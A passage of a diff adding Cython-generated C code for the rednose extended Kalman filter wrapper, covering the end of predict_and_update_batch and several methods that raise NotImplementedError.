(unlikely(!__pyx_t_7)) __PYX_ERR(0, 154, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } + } else { + __pyx_t_7 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_7)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 154, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_7); + } + __Pyx_XDECREF_SET(__pyx_v_args, __pyx_t_7); + __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":155 + * cdef vector[double] args_map + * for args in extra_args: + * args_map.clear() # <<<<<<<<<<<<<< + * for a in args: + * args_map.push_back(a) + */ + __pyx_v_args_map.clear(); + + /* "rednose/helpers/ekf_sym_pyx.pyx":156 + * for args in extra_args: + * args_map.clear() + * for a in args: # <<<<<<<<<<<<<< + * args_map.push_back(a) + * extra_args_map.push_back(args_map) + */ + if (likely(PyList_CheckExact(__pyx_v_args)) || PyTuple_CheckExact(__pyx_v_args)) { + __pyx_t_7 = __pyx_v_args; __Pyx_INCREF(__pyx_t_7); __pyx_t_17 = 0; + __pyx_t_18 = NULL; + } else { + __pyx_t_17 = -1; __pyx_t_7 = PyObject_GetIter(__pyx_v_args); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 156, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_18 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 156, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_18)) { + if (likely(PyList_CheckExact(__pyx_t_7))) { + if (__pyx_t_17 >= PyList_GET_SIZE(__pyx_t_7)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_7, __pyx_t_17); __Pyx_INCREF(__pyx_t_4); __pyx_t_17++; if (unlikely((0 < 0))) __PYX_ERR(0, 156, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_7, __pyx_t_17); __pyx_t_17++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 156, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_17 >= PyTuple_GET_SIZE(__pyx_t_7)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_7, __pyx_t_17); __Pyx_INCREF(__pyx_t_4); __pyx_t_17++; if (unlikely((0 < 0))) __PYX_ERR(0, 156, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_7, __pyx_t_17); __pyx_t_17++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 156, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_18(__pyx_t_7); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 156, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_a, __pyx_t_4); + __pyx_t_4 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":157 + * args_map.clear() + * for a in args: + * args_map.push_back(a) # <<<<<<<<<<<<<< + * extra_args_map.push_back(args_map) + * + */ + __pyx_t_19 = __pyx_PyFloat_AsDouble(__pyx_v_a); if (unlikely((__pyx_t_19 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 157, __pyx_L1_error) + try { + __pyx_v_args_map.push_back(__pyx_t_19); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 157, __pyx_L1_error) + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":156 + * for args in extra_args: + * args_map.clear() + * for a in args: # <<<<<<<<<<<<<< + * args_map.push_back(a) + * extra_args_map.push_back(args_map) + */ + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":158 + * for a in args: + * args_map.push_back(a) + * extra_args_map.push_back(args_map) # <<<<<<<<<<<<<< + * + * cdef optional[Estimate] res = self.ekf.predict_and_update_batch(t, kind, z_map, R_map, extra_args_map, augment) + */ + try { + __pyx_v_extra_args_map.push_back(__pyx_v_args_map); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 158, __pyx_L1_error) + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":154 + * cdef vector[vector[double]] extra_args_map + * cdef vector[double] args_map + * for args in extra_args: # <<<<<<<<<<<<<< + * args_map.clear() + * for a in args: + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":160 + * extra_args_map.push_back(args_map) + * + * cdef optional[Estimate] res = self.ekf.predict_and_update_batch(t, kind, z_map, R_map, extra_args_map, augment) # <<<<<<<<<<<<<< + * if not res.has_value(): + * return None + */ + __pyx_v_res = __pyx_v_self->ekf->predict_and_update_batch(__pyx_v_t, __pyx_v_kind, __pyx_v_z_map, __pyx_v_R_map, __pyx_v_extra_args_map, __pyx_v_augment); + + /* "rednose/helpers/ekf_sym_pyx.pyx":161 + * + * cdef optional[Estimate] res = self.ekf.predict_and_update_batch(t, kind, z_map, R_map, extra_args_map, augment) + * if not res.has_value(): # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_20 = (!(__pyx_v_res.has_value() != 0)); + if (__pyx_t_20) { + + /* "rednose/helpers/ekf_sym_pyx.pyx":162 + * cdef optional[Estimate] res = self.ekf.predict_and_update_batch(t, kind, z_map, R_map, extra_args_map, augment) + * if not res.has_value(): + * return None # <<<<<<<<<<<<<< + * + * cdef VectorXd tmpvec + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":161 + * + * cdef optional[Estimate] res = self.ekf.predict_and_update_batch(t, kind, z_map, R_map, extra_args_map, augment) + * if not res.has_value(): # <<<<<<<<<<<<<< + * return None + * + */ + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":165 + * + * cdef VectorXd tmpvec + * return ( # <<<<<<<<<<<<<< + * vector_to_numpy(res.value().xk1), + * vector_to_numpy(res.value().xk), + */ + __Pyx_XDECREF(__pyx_r); + + /* "rednose/helpers/ekf_sym_pyx.pyx":166 + * cdef VectorXd tmpvec + * return ( + * vector_to_numpy(res.value().xk1), # <<<<<<<<<<<<<< + * vector_to_numpy(res.value().xk), + * matrix_to_numpy(res.value().Pk1), + */ + __pyx_t_1 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(__pyx_v_res.value().xk1)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 166, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + + /* "rednose/helpers/ekf_sym_pyx.pyx":167 + * return ( + * vector_to_numpy(res.value().xk1), + * vector_to_numpy(res.value().xk), # <<<<<<<<<<<<<< + * matrix_to_numpy(res.value().Pk1), + * matrix_to_numpy(res.value().Pk), + */ + __pyx_t_7 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(__pyx_v_res.value().xk)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + + /* "rednose/helpers/ekf_sym_pyx.pyx":168 + * vector_to_numpy(res.value().xk1), + * vector_to_numpy(res.value().xk), + * matrix_to_numpy(res.value().Pk1), # <<<<<<<<<<<<<< + * matrix_to_numpy(res.value().Pk), + * res.value().t, + */ + __pyx_t_4 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_matrix_to_numpy(__pyx_v_res.value().Pk1)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 168, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + + /* "rednose/helpers/ekf_sym_pyx.pyx":169 + * vector_to_numpy(res.value().xk), + * matrix_to_numpy(res.value().Pk1), + * matrix_to_numpy(res.value().Pk), # <<<<<<<<<<<<<< + * res.value().t, + * res.value().kind, + */ + __pyx_t_6 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_matrix_to_numpy(__pyx_v_res.value().Pk)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 169, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + + /* "rednose/helpers/ekf_sym_pyx.pyx":170 + * matrix_to_numpy(res.value().Pk1), + * matrix_to_numpy(res.value().Pk), + * res.value().t, # <<<<<<<<<<<<<< + * res.value().kind, + * [vector_to_numpy(tmpvec) for tmpvec in res.value().y], + */ + __pyx_t_8 = PyFloat_FromDouble(__pyx_v_res.value().t); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 170, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + + /* "rednose/helpers/ekf_sym_pyx.pyx":171 + * matrix_to_numpy(res.value().Pk), + * res.value().t, + * res.value().kind, # <<<<<<<<<<<<<< + * [vector_to_numpy(tmpvec) for tmpvec in res.value().y], + * z, # TODO: take return values? + */ + __pyx_t_5 = __Pyx_PyInt_From_int(__pyx_v_res.value().kind); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + { /* enter inner scope */ + + /* "rednose/helpers/ekf_sym_pyx.pyx":172 + * res.value().t, + * res.value().kind, + * [vector_to_numpy(tmpvec) for tmpvec in res.value().y], # <<<<<<<<<<<<<< + * z, # TODO: take return values? + * extra_args, + */ + __pyx_t_21 = PyList_New(0); if (unlikely(!__pyx_t_21)) __PYX_ERR(0, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_21); + __pyx_t_23 = __pyx_v_res.value().y; + __pyx_t_22 = __pyx_t_23.begin(); + for (;;) { + if (!(__pyx_t_22 != __pyx_t_23.end())) break; + __pyx_t_24 = *__pyx_t_22; + ++__pyx_t_22; + __pyx_8genexpr1__pyx_v_tmpvec = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_24); + __pyx_t_25 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(__pyx_8genexpr1__pyx_v_tmpvec)); if (unlikely(!__pyx_t_25)) __PYX_ERR(0, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_25); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_21, (PyObject*)__pyx_t_25))) __PYX_ERR(0, 172, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_25); __pyx_t_25 = 0; + } + } /* exit inner scope */ + + /* "rednose/helpers/ekf_sym_pyx.pyx":166 + * cdef VectorXd tmpvec + * return ( + * vector_to_numpy(res.value().xk1), # <<<<<<<<<<<<<< + * vector_to_numpy(res.value().xk), + * matrix_to_numpy(res.value().Pk1), + */ + __pyx_t_25 = PyTuple_New(9); if (unlikely(!__pyx_t_25)) __PYX_ERR(0, 166, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_25); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_25, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_25, 1, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_25, 2, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_25, 3, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_8); + PyTuple_SET_ITEM(__pyx_t_25, 4, __pyx_t_8); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_25, 5, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_21); + PyTuple_SET_ITEM(__pyx_t_25, 6, __pyx_t_21); + __Pyx_INCREF(__pyx_v_z); + __Pyx_GIVEREF(__pyx_v_z); + PyTuple_SET_ITEM(__pyx_t_25, 7, __pyx_v_z); + __Pyx_INCREF(__pyx_v_extra_args); + __Pyx_GIVEREF(__pyx_v_extra_args); + PyTuple_SET_ITEM(__pyx_t_25, 8, __pyx_v_extra_args); + __pyx_t_1 = 0; + __pyx_t_7 = 0; + __pyx_t_4 = 0; + __pyx_t_6 = 0; + __pyx_t_8 = 0; + __pyx_t_5 = 0; + __pyx_t_21 = 0; + __pyx_r = __pyx_t_25; + __pyx_t_25 = 0; + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":139 + * self.ekf.predict(t) + * + * def predict_and_update_batch(self, double t, int kind, z, R, extra_args=[[]], bool augment=False): # <<<<<<<<<<<<<< + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_21); + __Pyx_XDECREF(__pyx_t_25); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Ri_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_zi_b.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.predict_and_update_batch", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Ri_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_zi_b.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_zi_b); + __Pyx_XDECREF(__pyx_v_zi); + __Pyx_XDECREF((PyObject *)__pyx_v_Ri_b); + __Pyx_XDECREF(__pyx_v_Ri); + __Pyx_XDECREF(__pyx_v_args); + __Pyx_XDECREF(__pyx_v_a); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":177 + * ) + * + * def augment(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment = {"augment", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("augment (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("augment", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "augment", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_20augment(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_20augment(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__30) + __Pyx_RefNannySetupContext("augment", 0); + __Pyx_TraceCall("augment", __pyx_f[0], 177, 0, __PYX_ERR(0, 177, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":178 + * + * def augment(self): + * raise NotImplementedError() # TODO # <<<<<<<<<<<<<< + * + * def get_augment_times(self): + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(__pyx_builtin_NotImplementedError); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 178, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 178, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":177 + * ) + * + * def augment(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.augment", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":180 + * raise NotImplementedError() # TODO + * + * def get_augment_times(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times = {"get_augment_times", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_augment_times (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("get_augment_times", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "get_augment_times", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_22get_augment_times(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_22get_augment_times(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__31) + __Pyx_RefNannySetupContext("get_augment_times", 0); + __Pyx_TraceCall("get_augment_times", __pyx_f[0], 180, 0, __PYX_ERR(0, 180, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":181 + * + * def get_augment_times(self): + * raise NotImplementedError() # TODO # <<<<<<<<<<<<<< + * + * def rts_smooth(self, estimates, norm_quats=False): + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(__pyx_builtin_NotImplementedError); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 181, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":180 + * raise NotImplementedError() # TODO + * + * def get_augment_times(self): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.get_augment_times", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":183 + * raise NotImplementedError() # TODO + * + * def rts_smooth(self, estimates, norm_quats=False): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth = {"rts_smooth", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_estimates = 0; + CYTHON_UNUSED PyObject *__pyx_v_norm_quats = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("rts_smooth (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_estimates,&__pyx_n_s_norm_quats,0}; + PyObject* values[2] = {0,0}; + values[1] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_estimates)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 183, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_norm_quats); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 183, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "rts_smooth") < 0)) __PYX_ERR(0, 183, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_estimates = values[0]; + __pyx_v_norm_quats = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("rts_smooth", 0, 1, 2, __pyx_nargs); __PYX_ERR(0, 183, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.rts_smooth", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_24rts_smooth(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_estimates, __pyx_v_norm_quats); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_24rts_smooth(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_estimates, CYTHON_UNUSED PyObject *__pyx_v_norm_quats) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__32) + __Pyx_RefNannySetupContext("rts_smooth", 0); + __Pyx_TraceCall("rts_smooth", __pyx_f[0], 183, 0, __PYX_ERR(0, 183, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":184 + * + * def rts_smooth(self, estimates, norm_quats=False): + * raise NotImplementedError() # TODO # <<<<<<<<<<<<<< + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(__pyx_builtin_NotImplementedError); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 184, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 184, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":183 + * raise NotImplementedError() # TODO + * + * def rts_smooth(self, estimates, norm_quats=False): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + 